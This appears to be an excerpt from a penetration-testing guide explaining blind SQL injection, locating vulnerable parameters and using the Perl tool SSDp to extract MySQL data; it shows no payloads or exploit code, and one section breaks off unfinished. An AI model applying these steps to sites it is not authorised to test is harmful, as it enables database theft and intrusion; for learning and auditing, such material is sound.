What is Blind SQL Injection?
Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather than getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible.
An attacker can still steal data by asking a series of True and False questions through SQL statements. The attacker provides your database application with some malformed data, and your application uses that data to build a SQL statement using string concatenation.
This allows the attacker to change the semantics of the SQL query. People tend to use string concatenation because they don’t know there’s another, safer method, and let’s be honest, string concatenation is easy, but it’s wrong step. A less common variant is SQL stored procedures that take a parameter and simply execute the argument or perform the string concatenation with the argument and then execute the result.
Nowadays, it is very easy to perform Blind SQL injection compare to a few years ago because a lot of SQL injection tools available on the Internet. You can download it from security website or hacker website and use it to test for MySQL, MSSQL or Oracle. By using these automated tools, it is very easy and fast to find holes or bugs for SQL injection or Blind SQL injection from a website.
Finding Vulnerable URL
Before you can perform Blind SQL Injection testing, you must find a vulnerable URL or path from the website where you can inject malicious code or character to the vulnerable parameter on the website. You need to find out why your website is vulnerable to Blind SQL injection before you can perform SQL injection attack to the vulnerable parameter. To find a vulnerable URL path.
Testing Vulnerable Parameter
From the results of testing in webscan.txt, we found some possible Blind SQL injection bugs at the targeted server and trying to proof that bugs. Let’s say that you are auditing a web application server and found a web page that accepts dynamic user-provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent header value.
You now want to test for SQL injection vulnerability, and trying to exploit the vulnerability to retrieve as much as information from the web application’s back-end database management system or even is able to access the underlying operating system. You must have a proof about the vulnerability that has been found by exploiting it until you will get the findings. To test a vulnerable parameter, you can use manual technique or automated tool.
Using Simple SQLi Dumper for Blind SQL Injection
Simple SQLi Dumper (SSDp) is an open source PHP MYSQL injection tool written in Perl scripting language. It is used to find bugs, errors or vulnerabilities in MySQL database. You must understand and know how to use SSDp tool.
If you do not understand how to use it, you can refer to the Help menu that built-in together with this tool (Use ssdp.pl –h command to see Help menu). From the targeted URL that I have tested in Chapter 3 above, I found vulnerability at the parameter pageid is vulnerable for injection. So, I used this vulnerable page to test with SSDp tool.